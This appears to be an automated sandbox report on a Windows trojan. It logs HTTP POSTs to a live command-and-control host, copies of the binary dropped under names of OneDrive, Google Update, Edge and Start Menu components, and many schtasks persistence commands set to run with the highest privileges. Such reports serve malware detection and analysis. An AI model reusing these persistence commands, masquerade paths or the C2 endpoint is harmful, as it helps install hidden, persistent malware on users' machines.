                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1324Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 977255cm.nyashkoon.in
                              Source: unknownHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://977255cm.nyashkX
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://977255cm.nyashkX:t
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://977255cm.nyashkoon.in
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://977255cm.nyashkoon.in/
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://977255cm.nyashkoon.in/secureWindows.php
                              Source: 0JLWNg4Sz1.exe, 00000000.00000002.1703180777.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9B770D470_2_00007FFD9B770D47
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9B770E430_2_00007FFD9B770E43
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9B8D370F0_2_00007FFD9B8D370F
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9B8D374C0_2_00007FFD9B8D374C
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9BB1AC120_2_00007FFD9BB1AC12
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9BB19E660_2_00007FFD9BB19E66
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B780D476_2_00007FFD9B780D47
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B780E436_2_00007FFD9B780E43
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B7B19986_2_00007FFD9B7B1998
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B7BEEA86_2_00007FFD9B7BEEA8
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B8E370F6_2_00007FFD9B8E370F
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B8E374C6_2_00007FFD9B8E374C
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB253846_2_00007FFD9BB25384
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB2AA816_2_00007FFD9BB2AA81
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB201106_2_00007FFD9BB20110
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB2906D6_2_00007FFD9BB2906D
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB2A71C6_2_00007FFD9BB2A71C
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeCode function: 7_2_00007FFD9B760D477_2_00007FFD9B760D47
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeCode function: 7_2_00007FFD9B760E437_2_00007FFD9B760E43
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 25_2_00007FFD9B780D4725_2_00007FFD9B780D47
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 25_2_00007FFD9B780E4325_2_00007FFD9B780E43
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 26_2_00007FFD9B790D4726_2_00007FFD9B790D47
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 26_2_00007FFD9B790E4326_2_00007FFD9B790E43
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 27_2_00007FFD9B780D4727_2_00007FFD9B780D47
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 27_2_00007FFD9B780E4327_2_00007FFD9B780E43
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 27_2_00007FFD9B7B199827_2_00007FFD9B7B1998
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 28_2_00007FFD9B760D4728_2_00007FFD9B760D47
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 28_2_00007FFD9B760E4328_2_00007FFD9B760E43
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 28_2_00007FFD9B79199828_2_00007FFD9B791998
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 29_2_00007FFD9B760D4729_2_00007FFD9B760D47
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 29_2_00007FFD9B760E4329_2_00007FFD9B760E43
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 29_2_00007FFD9B79199829_2_00007FFD9B791998
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 30_2_00007FFD9B770D4730_2_00007FFD9B770D47
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 30_2_00007FFD9B770E4330_2_00007FFD9B770E43
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 30_2_00007FFD9B7A199830_2_00007FFD9B7A1998
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 31_2_00007FFD9B7A199831_2_00007FFD9B7A1998
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 31_2_00007FFD9B770D4731_2_00007FFD9B770D47
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 31_2_00007FFD9B770E4331_2_00007FFD9B770E43
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ALzNWdSZ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                              Source: 0JLWNg4Sz1.exe, 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 00000000.00000002.1713723661.000000001C6B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.0000000002613000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.00000000025C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000035AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.0000000003533000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
                              Source: 0JLWNg4Sz1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 0JLWNg4Sz1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: DViaOgnvmAhwCXZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: DViaOgnvmAhwCXZ.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: smartscreen.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@36/25@1/1
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Program Files (x86)\microsoft\Edge\smartscreen.exeJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Users\user\Desktop\ALzNWdSZ.logJump to behavior
                              Source: C:\Recovery\StartMenuExperienceHost.exeMutant created: NULL
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-sKFQIzXKnAf7PnSalSzG
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Users\user\AppData\Local\Temp\aC4Ftn18TqJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
                              Source: 0JLWNg4Sz1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 0JLWNg4Sz1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 0JLWNg4Sz1.exeReversingLabs: Detection: 65%
                              Source: 0JLWNg4Sz1.exeVirustotal: Detection: 56%
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile read: C:\Users\user\Desktop\0JLWNg4Sz1.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\0JLWNg4Sz1.exe "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknownProcess created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                              Source: unknownProcess created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
                              Source: unknownProcess created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
